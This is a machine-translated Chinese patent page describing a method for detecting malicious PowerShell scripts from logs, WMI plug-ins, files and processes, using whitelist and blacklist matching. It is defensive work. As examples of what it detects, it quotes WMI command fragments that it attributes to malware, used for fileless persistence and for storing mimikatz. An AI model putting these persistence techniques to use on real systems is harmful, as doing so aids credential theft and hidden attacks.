CN110806980A - Detection method, device, equipment and storage medium - Google Patents
Detection method, device, equipment and storage medium Download PDFInfo
- Publication number
- CN110806980A CN110806980A CN201911067297.2A CN201911067297A CN110806980A CN 110806980 A CN110806980 A CN 110806980A CN 201911067297 A CN201911067297 A CN 201911067297A CN 110806980 A CN110806980 A CN 110806980A
- Authority
- CN
- China
- Prior art keywords
- script
- detection
- features
- feature
- acquiring
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Pending
Links
Images
Classifications
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F11/00—Error detection; Error correction; Monitoring
- G06F11/36—Preventing errors by testing or debugging software
- G06F11/362—Software debugging
- G06F11/3644—Software debugging by instrumenting at runtime
-
- G—PHYSICS
- G06—COMPUTING; CALCULATING OR COUNTING
- G06F—ELECTRIC DIGITAL DATA PROCESSING
- G06F11/00—Error detection; Error correction; Monitoring
- G06F11/36—Preventing errors by testing or debugging software
- G06F11/362—Software debugging
- G06F11/366—Software debugging using diagnostics
Landscapes
- Engineering & Computer Science (AREA)
- Theoretical Computer Science (AREA)
- Computer Hardware Design (AREA)
- Quality & Reliability (AREA)
- Physics & Mathematics (AREA)
- General Engineering & Computer Science (AREA)
- General Physics & Mathematics (AREA)
- Debugging And Monitoring (AREA)
Abstract
The application discloses a detection method, a detection device, equipment and a storage medium, wherein the method comprises the following steps: acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script; acquiring a detection standard corresponding to the script characteristics; and detecting the script characteristics according to the detection standard to generate a detection result. The method relatively ensures the stability of service operation in the server. In addition, the application also provides a detection device, equipment and a storage medium, and the beneficial effects are as described above.
Description
Technical Field
The present application relates to the field of network security, and in particular, to a detection method, apparatus, device, and storage medium.
Background
In the field of computer science, Shell is software (command parser) that provides an operation interface for a user, and is used to receive a user command and then call a corresponding application program.
The Shell script is a program written by utilizing the functions of the Shell, the program uses a plain text file, some grammars and instructions of the Shell are written in the program, and then the functions of normal representation, pipeline commands, data stream redirection and the like are used for achieving the processing purpose which is required by people. Because the Shell script has higher performability, a malicious user usually tampers the data of the server in a mode of implanting and executing the Shell script in the server at present, so that the stability of service operation in the server is reduced.
Therefore, it is a problem to be solved by those skilled in the art to provide a detection method to relatively ensure the stability of service operation in a server.
Disclosure of Invention
The application aims to provide a detection method, a detection device, a detection equipment and a storage medium, so as to relatively ensure the stability of service operation in a server.
In order to solve the above technical problem, the present application provides a detection method, including:
acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
acquiring a detection standard corresponding to the script characteristics;
and detecting the script characteristics according to the detection standard to generate a detection result.
Preferably, the script features include one or more of instructions executed by the script, strings in the script, and paths of the script.
Preferably, when the target detection dimension is a log generated in the script execution process, acquiring script features of the script in the target detection dimension includes:
and reading the log file under the log path corresponding to the script, and acquiring the script characteristics in the log file.
Preferably, when the target detection dimension is a WMI system plug-in called during the script execution process, acquiring a script feature of the script in the target detection dimension includes:
and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading script characteristics in the parameters of the WMI class.
Preferably, when the target detection dimension is a file of the script, acquiring script features of the script in the target detection dimension includes:
and acquiring related files triggered when the script is executed, and acquiring script characteristics according to the related files.
Preferably, when the target detection dimension is a progress of the script, acquiring a script feature of the script in the target detection dimension includes:
and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
Preferably, the obtaining of the detection criteria corresponding to the script features includes:
and acquiring a feature white list and a feature black list corresponding to the script features.
Preferably, the detecting the script features according to the detection standard to generate a detection result includes:
judging whether the script features are matched with a feature white list or not;
if the script features are matched with the feature white list, setting the script features as normal features;
if the script features are not matched with the feature white list, judging whether the script features are matched with the feature black list;
if the script features are matched with the feature blacklist, setting the script features as abnormal features;
if the script features do not match the feature blacklist, the user is prompted for the script features.
In addition, this application still provides a detection device, includes:
the characteristic reading module is used for acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
the detection standard acquisition module is used for acquiring a detection standard corresponding to the script characteristics;
and the detection module is used for detecting the script characteristics according to the detection standard to generate a detection result.
In addition, the present application also provides an electronic device, including:
a memory for storing a computer program;
a processor for implementing the steps of the detection method as described above when executing the computer program.
Furthermore, the present application also provides a computer-readable storage medium, on which a computer program is stored, which, when being executed by a processor, realizes the steps of the detection method as described above.
The detection method comprises the steps of firstly obtaining script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script, further obtaining a detection standard corresponding to the script characteristics, and detecting the script characteristics according to the detection standard to generate a detection result. Because the log generated in the script execution process, the WMI system plug-in called in the script execution process, the script file and the script process can all obtain the relevant characteristics representing the identity of the script, whether the script is a malicious script or not can be further detected and judged based on the log of the script, the WMI system plug-in and the file and the relevant characteristics of any dimension in the process, the script which is possible to tamper the data of the server can be filtered out, and the stability of service operation in the server is relatively ensured. In addition, the application also provides a detection device, equipment and a storage medium, and the beneficial effects are as described above.
Drawings
In order to more clearly illustrate the embodiments of the present application, the drawings needed for the embodiments will be briefly described below, and it is obvious that the drawings in the following description are only some embodiments of the present application, and that other drawings can be obtained by those skilled in the art without inventive effort.
FIG. 1 is a flow chart of a detection method disclosed herein;
FIG. 2 is a flow chart of a particular detection method disclosed herein;
FIG. 3 is a flow chart of a particular detection method disclosed herein;
FIG. 4 is a flow chart of a particular detection method disclosed herein;
FIG. 5 is a flow chart of a particular detection method disclosed herein;
FIG. 6 is a flow chart of a particular detection method disclosed herein;
fig. 7 is a schematic structural diagram of a detection apparatus disclosed in the present application.
Detailed Description
The technical solutions in the embodiments of the present application will be clearly and completely described below with reference to the drawings in the embodiments of the present application, and it is obvious that the described embodiments are only a part of the embodiments of the present application, and not all the embodiments. All other embodiments obtained by a person of ordinary skill in the art based on the embodiments in the present application without any creative effort belong to the protection scope of the present application.
The Shell script is a program written by utilizing the functions of the Shell, the program uses a plain text file, some grammars and instructions of the Shell are written in the program, and then the functions of normal representation, pipeline commands, data stream redirection and the like are used for achieving the processing purpose which is required by people. Because the Shell script has higher performability, a malicious user usually tampers the data of the server in a mode of implanting and executing the Shell script in the server at present, so that the stability of service operation in the server is reduced.
Therefore, the core of the application is to provide a detection method to relatively ensure the stability of service operation in the server.
Referring to fig. 1, an embodiment of the present application discloses a detection method, including:
step S10: and acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script.
It should be noted that, in essence, this step is to acquire a script feature of the script in an object detection dimension, where the object detection dimension refers to a related program or file that can embody a static attribute feature or a dynamic attribute feature of the script.
The embodiment focuses on that the target detection dimension at least comprises logs generated in the script execution process and/or WMI system plug-ins called in the script execution process. Because the log generated in the execution process of the script records the static attribute characteristics or dynamic attribute characteristics of the script, namely the script characteristics, if the script has the capability of generating the log in the execution process, and the script characteristics embody the characteristics of the script and the possibly executed related operation behaviors, the identity of the script can be judged according to the script characteristics; similarly, the script can register the dynamic attribute features or the static attribute features of the script into the system through the WMI system plug-in, so that the purpose that the system automatically triggers and executes the operation contents in the script is achieved, and further, the malicious script can realize persistent attack on the system based on the WMI system plug-in, so that the dynamic attribute features or the static attribute features of the script, namely the script features, can be obtained through the WMI system plug-in as well; in addition, since the script can execute a file which essentially requires the script as support, the instruction executed by the script, the character string in the script and the path where the script is located can also be acquired through the file of the script; in addition, during the execution process of the script, a corresponding process is started in the system, so that the type of the script can be judged according to the file of the script and the process started in the system during the execution of the script, the richness of the target detection dimension according to which the script is detected is relatively improved, and the overall accuracy of the script detection is further improved.
Step S11: and acquiring a detection standard corresponding to the script feature.
On the basis of acquiring the script features, the present embodiment further determines the identity of the corresponding script based on the script features, so that a corresponding detection standard is first acquired for the script features, and the detection standard is used to determine whether the content of the script features is in the content category of a certain type of script. It can be understood that, since there are corresponding determination criteria for different types of script features, when there are multiple types of script features, corresponding detection criteria should be obtained for each type of script feature.
Step S12: and detecting the script characteristics according to the detection standard to generate a detection result.
After the script features and the detection criteria corresponding to the script features are obtained, the script features are further detected according to the detection criteria, that is, the content category of the script of which type is the content of the script features is determined based on the detection criteria, and then the detection result representing the type to which the script belongs is obtained.
The detection method comprises the steps of firstly obtaining script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script, further obtaining a detection standard corresponding to the script characteristics, and detecting the script characteristics according to the detection standard to generate a detection result. Because the log generated in the script execution process, the WMI system plug-in called in the script execution process, the script file and the script process can all obtain the relevant characteristics representing the identity of the script, whether the script is a malicious script or not can be further detected and judged based on the log of the script, the WMI system plug-in and the file and the relevant characteristics of any dimension in the process, the script which is possible to tamper the data of the server can be filtered out, and the stability of service operation in the server is relatively ensured.
On the basis of the above-described examples, the present application also provides the following preferred embodiments.
As a preferred embodiment, the script features include one or more of instructions executed by the script, strings in the script, and paths of the script.
It should be noted that, the logs generated during the script execution process and the WMI system plug-in called during the script execution process can directly acquire the instructions executed by the script, the character strings in the script, and the paths where the script is located, and there is direct association between the normal script and the malicious script among the instructions executed by the normal script, the character strings in the script, and the paths where the script is located, so that the type of the script can be determined relatively accurately by acquiring one or more of the instructions executed by the script, the character strings in the script, and the paths of the script.
When the target detection dimension is a log generated in the script execution process, an embodiment of the present application discloses a detection method, as shown in fig. 2, including:
step S20: and reading the log file under the log path corresponding to the script, and acquiring the script characteristics in the log file.
Step S21: and acquiring a detection standard corresponding to the script feature.
Step S22: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that in this embodiment, script features need to be obtained based on a log generated in the script execution process, and the log generated in the script execution process is often recorded in a log file under a log path corresponding to the script, so when the target detection dimension is the log generated in the script execution process, in this embodiment, the log file is read under the log path corresponding to the script, and then the script features are obtained in the obtained log file, which relatively ensures accurate obtaining of the log file, and further ensures accuracy of the script features.
On the basis of the above embodiment, as a preferred implementation manner, when the object detection dimension is a file of the script, the script feature further includes a file hash value of the script and a file of the indirect call script.
It should be noted that the file hash value in this embodiment is generated by performing a hash function operation on a script-based file, and the hash value can represent a unique file identity, so that the identity type of the script can be accurately obtained through the file hash value of the script; in addition, the file which indirectly calls the script file to cause the script file to be executed can be further searched according to the script file, and the identity type of the script file can be further obtained according to the judgment of the type of the file which calls the script file to be executed. According to the embodiment, the accuracy of detecting the script when the target detection dimension is the file of the script can be further improved.
When the target detection dimension is a WMI system plug-in called in the script execution process, an embodiment of the present application discloses a detection method, as shown in fig. 3, including:
step S30: and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading script characteristics in the parameters of the WMI class.
Step S31: and acquiring a detection standard corresponding to the script feature.
Step S32: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that in this embodiment, a script feature needs to be obtained based on a WMI system plug-in called in the script execution process, and the script feature is often used as a WMI type parameter called by the WMI system plug-in to implement execution of the WMI system plug-in, so that the embodiment obtains the WMI type corresponding to the WMI system plug-in called in the script execution process, and further reads the script feature in the WMI type parameter, thereby relatively ensuring accurate obtaining of a log file, and further ensuring accuracy of the script feature.
When the target detection dimension is a file of a script, an embodiment of the present application discloses a detection method, as shown in fig. 4, including:
step S40: and acquiring related files triggered when the script is executed, and acquiring script characteristics according to the related files.
Step S41: and acquiring a detection standard corresponding to the script feature.
Step S42: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that, in this embodiment, the target detection dimension is a file dimension of the script, so that the script feature should be obtained based on the file related to the script, and then the embodiment obtains the related file triggered when the script is executed, and then obtains the script feature according to the related file.
When the target detection dimension is a process of a script, an embodiment of the present application discloses a detection method, as shown in fig. 5, including:
step S50: and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
Step S51: and acquiring a detection standard corresponding to the script feature.
Step S52: and detecting the script characteristics according to the detection standard to generate a detection result.
It should be noted that, in this embodiment, the target detection dimension is a process of the script, and therefore, the present embodiment should obtain, based on a process related to the script, a related process started when the script is executed, and further obtain a script feature according to the related process, because an instruction executed by the script directly determines the process started by the script, and the process started when the script is executed can reflect an operation behavior executed by the script, that is, the correlation between the related process started when the script is executed and the script is high, when the target detection dimension is a process of the script, the type of the script can be further obtained by determining the process started when the script is executed. Therefore, the script characteristics are obtained according to the related processes started when the script is executed, and the accuracy of the script characteristics can be relatively ensured.
On the basis of the above embodiment, as a preferred implementation, the script may specifically include a PowerShell script, where the PowerShell is a command line script environment that runs on a Windows operating system to implement management automation of the system and the application program, and the PowerShell requires support of a NET environment, and with the help of a strong class library of a NET Framework platform, rich and comprehensive operations can be performed on the system, and server attack through the PowerShell script is a popular attack mode at present, so that the implementation can relatively ensure reliability of detection on the PowerShell script in the server, and further ensure stability of service running in the server.
Referring to fig. 6, an embodiment of the present application discloses a detection method, including:
step S60: and acquiring script characteristics of the script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script.
Step S61: and acquiring a feature white list and a feature black list corresponding to the script features.
Step S62: and judging whether the script features are matched with the feature white list, if so, executing the step S63, and otherwise, executing the step S64.
Step S63: the script feature is set to the normal feature.
Step S64: and judging whether the script features are matched with the feature blacklist, if so, executing the step S65, and otherwise, executing the step S66.
Step S65: the script feature is set to an exception feature.
Step S66: and prompting the script characteristics to the user for the user to judge the script characteristics.
It should be noted that, in this embodiment, the process of detecting the script essentially judges whether the script features of the script in the target detection dimension are matched with the features in the feature white list and the feature blacklist, and if the script features of the script in the target detection dimension are matched with the features in the feature white list, it is determined that the script features are normal features, that is, the corresponding script is a normal script; if the script features of the script under the target detection dimension are matched with the features in the feature blacklist, the script features are indicated to be abnormal features, namely the corresponding script is abnormal, and further, if the script features are not matched with the features in the feature blacklist and are not matched with the features in the feature whitelist, the script features are prompted to a user for the user to further judge the script features.
In this embodiment, after the feature white list and the feature blacklist corresponding to the script feature are obtained, the script feature is further matched with the content in the feature white list, and if the script feature is not matched with the feature white list, whether the script feature is matched with the feature blacklist is further determined.
In addition, it should be emphasized that, although the solution of this embodiment is to match the script features with the content in the feature white list first, and match the script features with the content in the feature blacklist when the script features are not matched, the present application is not limited to the above matching sequence, but the script features may be first matched with the content in the feature blacklist, if the script features are not matched with the feature blacklist, the script features are further matched with the feature white list, and further, if the script features are not matched with the feature white list, the script features are further prompted to the user for the user to determine the script features.
As a preferred embodiment, after the script feature is determined as an abnormal feature, the script feature may be further mapped to a script to which the script feature belongs, and the script is deleted or a popup abnormal prompt is presented to the user for the script, so that the user can manually determine the script feature and generate a corresponding detection result.
In order to further deepen understanding of the technical solution of the present application, a scene embodiment in a specific scene is provided below for explanation.
According to the scheme, the PowerShell attack script is subjected to deep systematic detection from four dimensions of file monitoring, process monitoring, log monitoring, WMI monitoring and the like based on abnormal behavior characteristics and black-to-white operation selectable by a user.
1. In the aspect of files, the newly generated files can be filtered by utilizing real-time file monitoring, and potential PowerShell related files are filtered and matched.
Specifically, the newly generated files are filtered by utilizing real-time file monitoring, and potential PowerShell related files are filtered out. PowerShell potential related files have two categories, namely PowerShell script files and PowerShell calling files. The former type, which is a ps1 format file, can be directly parsed and run by PowerShell. The latter type can be files in bat, hta, vbs, office (vba) and other formats, and the like, and the purpose of calling PowerShell can be indirectly achieved through calling by a host program.
2. In the process aspect, potential PowerShell related processes can be filtered out through process real-time monitoring, PowerShell scripts are related in advance, and finally matching is carried out.
Potential PowerShell related processes are filtered out by monitoring the processes in real time. There are two main categories of PowerShell potentially related processes, one is PowerShell process and the other is PowerShell calling process. The former is a process running on PowerShell. exe, which is a system file responsible for parsing PowerShell. The latter process is called by corresponding script, so as to indirectly call the PowerShell.
3. In the aspect of logs, the PowerShell is audited by a system and descended as logs in the calling execution process, so that whether malicious PowerShell scripts exist or not can be judged according to the logs.
When executing any PowerShell command or script, Windows can write events to the following log files, either locally or through remote processing:
Windows PowerShell.evtx;
Microsoft-Windows-PowerShell/Operational.evtx;
Microsoft-Windows-PowerShell/Analytic.etl;
Microsoft-Windows-WinRM/Operational.evtx;
Microsoft-Windows-WinRM/Analytic.etl。
4. in the aspect of WMI, WMI + PowerShell is an important mode for realizing persistent non-file attack, so that the monitoring of WMI can also play a role in detecting PowerShell attack scripts.
WMI + PowerShell is an important mode for realizing persistent non-file attack, so that WMI is monitored, and the effect of detecting PowerShell attack scripts can be achieved.
Example 1: ([ WmicClass ] 'root \ default: Win32_ Taskservice'). Properties [ 'mi' ]
The above command, wmilass is WMI class, and the virus registers the class Win32_ TaskService, and is given the mimi object definition, which is the well-known hacker tool mimkatz, dedicated to the lower password stealing in intranet penetration and attack scenarios.
Example 2: SELECT FROM INSTANCE MODIFICATION EVENT WITHIN 5600
The above command, that is, the WMI class is registered as 5600 second timer started, and the start item is named as InstanceModificationEvent, which corresponds to the WMI class ([ WmiClass ] 'root \ default: Win32_ Services').
The general logic of script detection is as follows, firstly, white feature matching is carried out on the relevant script features of the dimensionality, if the white feature matching is achieved, the release is omitted, and the process is ended; if the matching is not successful, performing black feature matching on the script features, if so, giving an alarm and intercepting, and ending the process; if the number of the user selection actions is not equal to the number of the user selection actions, namely whether the user selection actions are black or not, the user selection actions are manually judged and selected, and the judging actions are as follows:
ignoring: ignoring the behavior, not recording any log or executing any operation, and still walking the process next time;
and (3) black blocking: intercepting the action, recognizing the action as black, entering a black characteristic, and automatically intercepting the next time;
putting white into a container: put through this action and regard this action as white, put into the white characteristic, put through automatically next time.
Referring to fig. 7, an embodiment of the present application discloses a detection apparatus, including:
the feature reading module 10 is configured to obtain a script feature of a script in a target detection dimension, where the target detection dimension at least includes a log generated in a script execution process and/or a WMI system plug-in called in the script execution process;
a detection standard obtaining module 11, configured to obtain a detection standard corresponding to the script feature;
and the detection module 12 is configured to detect the script features according to the detection standard to generate a detection result.
The detection device provided by the application firstly obtains script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script, and then obtains a detection standard corresponding to the script characteristics, and detects the script characteristics according to the detection standard to generate a detection result. Because the log generated in the script execution process, the WMI system plug-in called in the script execution process, the script file and the script process can all obtain the relevant characteristics representing the identity of the script, whether the script is a malicious script or not can be further detected and judged based on the log of the script, the WMI system plug-in and the file and the relevant characteristics of any dimension in the process, the script which is possible to tamper the data of the server can be filtered out, and the stability of service operation in the server is relatively ensured.
On the basis of the foregoing embodiments, the embodiments of the present application further describe and optimize the detection device. Specifically, the method comprises the following steps:
in one embodiment, the script features include one or more of instructions for execution of the script, strings in the script, and paths of the script.
In one embodiment, when the target detection dimension is a log generated during script execution, the feature reading module 10 includes:
and the log characteristic acquisition module is used for reading the log file under the log path corresponding to the script and acquiring the script characteristics in the log file.
In one embodiment, when the target detection dimension is a WMI system plug-in invoked during script execution, the feature reading module 10 includes:
and the WMI characteristic reading module is used for acquiring the WMI class corresponding to the WMI system plug-in called in the script execution process and reading the script characteristics in the parameters of the WMI class.
In one embodiment, when the object detection dimension is a file of a script, the feature reading module 10 includes:
and the file characteristic reading module is used for acquiring related files triggered when the script is executed and acquiring script characteristics according to the related files.
In one embodiment, when the target detection dimension is a progress of a script, the feature reading module 10 includes:
and the process characteristic reading module is used for acquiring a related process started when the script is executed and acquiring the script characteristics according to the related process.
In one embodiment, the detection criterion acquiring module 11 includes:
the black and white list acquisition module is used for acquiring a feature white list and a feature black list corresponding to the script features;
a detection module 12 comprising:
the white list judging module is used for judging whether the script features are matched with the feature white list;
the normal feature module is used for setting the script features as normal features if the script features are matched with the feature white list;
the blacklist judging module is used for judging whether the script features are matched with the feature blacklist or not if the script features are not matched with the feature whitelist;
and the abnormal characteristic module is used for setting the script characteristics as abnormal characteristics if the script characteristics are matched with the characteristic blacklist.
And the user prompting module is used for prompting the script characteristics to the user if the script characteristics are not matched with the characteristic blacklist.
In addition, this embodiment also discloses an electronic device, including:
a memory for storing a computer program;
a processor for implementing the steps of the detection method as described above when executing the computer program.
The electronic device provided by the application firstly obtains script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script, and then obtains a detection standard corresponding to the script characteristics, and detects the script characteristics according to the detection standard to generate a detection result. Because the log generated in the script execution process, the WMI system plug-in called in the script execution process, the script file and the script process can all obtain the relevant characteristics representing the identity of the script, whether the script is a malicious script or not can be further detected and judged based on the log of the script, the WMI system plug-in and the file and the relevant characteristics of any dimension in the process, the script which is possible to tamper the data of the server can be filtered out, and the stability of service operation in the server is relatively ensured.
Further, the present application also provides a computer readable storage medium, on which a computer program is stored, and the computer program, when executed by a processor, implements the steps of the detection method as described above. With regard to the specific steps of the method, reference may be made to the detection method disclosed in the foregoing embodiment. For the specific steps of the method, reference may be made to the corresponding contents disclosed in the foregoing embodiments, which are not described herein again.
The computer-readable storage medium provided by the application firstly obtains script features of a script under a target detection dimension, wherein the target detection dimension at least comprises one of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script, and then obtains a detection standard corresponding to the script features, and detects the script features according to the detection standard to generate a detection result. Because the log generated in the script execution process, the WMI system plug-in called in the script execution process, the script file and the script process can all obtain the relevant characteristics representing the identity of the script, whether the script is a malicious script or not can be further detected and judged based on the log of the script, the WMI system plug-in and the file and the relevant characteristics of any dimension in the process, the script which is possible to tamper the data of the server can be filtered out, and the stability of service operation in the server is relatively ensured.
The above description provides a detection apparatus, a device and a storage medium. The embodiments are described in a progressive manner in the specification, each embodiment focuses on differences from other embodiments, and the same and similar parts among the embodiments are referred to each other. The device disclosed by the embodiment corresponds to the method disclosed by the embodiment, so that the description is simple, and the relevant points can be referred to the method part for description. It should be noted that, for those skilled in the art, it is possible to make several improvements and modifications to the present application without departing from the principle of the present application, and such improvements and modifications also fall within the scope of the claims of the present application.
It is further noted that, in the present specification, relational terms such as first and second, and the like are used solely to distinguish one entity or action from another entity or action without necessarily requiring or implying any actual such relationship or order between such entities or actions. Also, the terms "comprises," "comprising," or any other variation thereof, are intended to cover a non-exclusive inclusion, such that a process, method, article, or apparatus that comprises a list of elements does not include only those elements but may include other elements not expressly listed or inherent to such process, method, article, or apparatus. Without further limitation, an element defined by the phrase "comprising an … …" does not exclude the presence of other identical elements in a process, method, article, or apparatus that comprises the element.
Claims (10)
1. A method of detection, comprising:
acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
acquiring a detection standard corresponding to the script feature;
and detecting the script characteristics according to the detection standard to generate a detection result.
2. The detection method according to claim 1, wherein the script features include one or more of instructions executed by the script, character strings in the script, and paths of the script.
3. The method according to claim 2, wherein when the target detection dimension is a log generated during the script execution process, the obtaining of the script feature of the script in the target detection dimension includes:
and reading a log file under a log path corresponding to the script, and acquiring the script characteristics in the log file.
4. The detection method according to claim 2, wherein when the target detection dimension is a WMI system plug-in invoked during the script execution process, the obtaining of the script characteristics of the script in the target detection dimension includes:
and acquiring a WMI class corresponding to the WMI system plug-in called in the script execution process, and reading the script characteristics in the parameters of the WMI class.
5. The method according to claim 2, wherein when the target detection dimension is a file of the script, the obtaining script features of the script in the target detection dimension includes:
and acquiring a related file triggered when the script is executed, and acquiring the script characteristics according to the related file.
6. The method according to claim 2, wherein when the target detection dimension is a progress of the script, the obtaining script features of the script in the target detection dimension includes:
and acquiring a related process started when the script is executed, and acquiring the script characteristics according to the related process.
7. The method according to any one of claims 1 to 6, wherein the detection criteria include a feature white list and a feature black list;
the detecting the script features according to the detection standard to generate a detection result includes:
judging whether the script features are matched with the feature white list or not;
if the script features are matched with the feature white list, setting the script features as normal features;
if the script features are not matched with the feature white list, judging whether the script features are matched with the feature black list;
setting the script features as abnormal features if the script features are matched with the feature blacklist;
and if the script features are not matched with the feature blacklist, prompting the script features to a user for the user to judge the script features.
8. A detection device, comprising:
the characteristic reading module is used for acquiring script characteristics of a script under a target detection dimension, wherein the target detection dimension at least comprises one or more of a log generated in the script execution process, a WMI system plug-in called in the script execution process, a file of the script and a process of the script;
the detection standard acquisition module is used for acquiring a detection standard corresponding to the script characteristics;
and the detection module is used for detecting the script characteristics according to the detection standard to generate a detection result.
9. An electronic device, comprising:
a memory for storing a computer program;
a processor for implementing the steps of the detection method according to any one of claims 1 to 7 when executing the computer program.
10. A computer-readable storage medium, characterized in that a computer program is stored on the computer-readable storage medium, which computer program, when being executed by a processor, carries out the steps of the detection method according to any one of claims 1 to 7.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911067297.2A CN110806980A (en) | 2019-11-04 | 2019-11-04 | Detection method, device, equipment and storage medium |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201911067297.2A CN110806980A (en) | 2019-11-04 | 2019-11-04 | Detection method, device, equipment and storage medium |
Publications (1)
| Publication Number | Publication Date |
|---|---|
| CN110806980A true CN110806980A (en) | 2020-02-18 |
Family
ID=69501182
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201911067297.2A Pending CN110806980A (en) | 2019-11-04 | 2019-11-04 | Detection method, device, equipment and storage medium |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110806980A (en) |
Cited By (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN114021125A (en) * | 2021-11-10 | 2022-02-08 | 安天科技集团股份有限公司 | Terminal equipment abnormity detection method and device, computing equipment and storage medium |
| CN114466074A (en) * | 2021-12-10 | 2022-05-10 | 奇安信科技集团股份有限公司 | Attack behavior detection method and device based on WMI |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20080320498A1 (en) * | 2007-06-23 | 2008-12-25 | Microsoft Corporation | High Performance Script Behavior Detection Through Browser Shimming |
| CN103221960A (en) * | 2012-12-10 | 2013-07-24 | 华为技术有限公司 | Detection method and apparatus of malicious code |
| US20160171216A1 (en) * | 2014-12-12 | 2016-06-16 | International Business Machines Corporation | Normalizing and detecting inserted malicious code |
| CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
-
2019
- 2019-11-04 CN CN201911067297.2A patent/CN110806980A/en active Pending
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US20080320498A1 (en) * | 2007-06-23 | 2008-12-25 | Microsoft Corporation | High Performance Script Behavior Detection Through Browser Shimming |
| CN103221960A (en) * | 2012-12-10 | 2013-07-24 | 华为技术有限公司 | Detection method and apparatus of malicious code |
| US20160171216A1 (en) * | 2014-12-12 | 2016-06-16 | International Business Machines Corporation | Normalizing and detecting inserted malicious code |
| CN108459962A (en) * | 2018-01-23 | 2018-08-28 | 平安普惠企业管理有限公司 | Code specification detection method, device, terminal device and storage medium |
Cited By (3)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN114021125A (en) * | 2021-11-10 | 2022-02-08 | 安天科技集团股份有限公司 | Terminal equipment abnormity detection method and device, computing equipment and storage medium |
| CN114466074A (en) * | 2021-12-10 | 2022-05-10 | 奇安信科技集团股份有限公司 | Attack behavior detection method and device based on WMI |
| CN114466074B (en) * | 2021-12-10 | 2024-04-30 | 奇安信科技集团股份有限公司 | WMI-based attack behavior detection method and device |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN108133139B (en) | Android malicious application detection system based on multi-operation environment behavior comparison | |
| US8424090B2 (en) | Apparatus and method for detecting obfuscated malicious web page | |
| US8898775B2 (en) | Method and apparatus for detecting the malicious behavior of computer program | |
| CN109033828B (en) | Trojan horse detection method based on computer memory analysis technology | |
| KR101647487B1 (en) | Analysis system and method for patch file | |
| CN107609396B (en) | Escape detection method based on sandbox virtual machine | |
| CN110225029B (en) | Injection attack detection method, device, server and storage medium | |
| CN109101815B (en) | Malicious software detection method and related equipment | |
| US20070156644A1 (en) | SQL injection detector | |
| CN107483510B (en) | Method and device for improving attack detection accuracy of Web application layer | |
| CN111291384B (en) | Vulnerability scanning method and device and electronic equipment | |
| KR101537088B1 (en) | System and method for detecting malicious code based on api calling flow | |
| US20110219454A1 (en) | Methods of identifying activex control distribution site, detecting security vulnerability in activex control and immunizing the same | |
| CN112084497A (en) | Method and device for detecting malicious program of embedded Linux system | |
| JP6282217B2 (en) | Anti-malware system and anti-malware method | |
| CN109783316B (en) | Method and device for identifying tampering behavior of system security log, storage medium and computer equipment | |
| CN108595953A (en) | Method for carrying out risk assessment on mobile phone application | |
| CN110806980A (en) | Detection method, device, equipment and storage medium | |
| CN112035354A (en) | Method, device and equipment for positioning risk code and storage medium | |
| CN107103243B (en) | Vulnerability detection method and device | |
| CN112422581B (en) | Webshell webpage detection method, device and equipment in JVM (Java virtual machine) | |
| CN110955894B (en) | Malicious content detection method and device, electronic equipment and readable storage medium | |
| CN111291377A (en) | Application vulnerability detection method and system | |
| CN113595975A (en) | Detection method and device for Webshell of Java memory | |
| KR101431192B1 (en) | Method for Rooting Attack Events Detection on Mobile Device |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination |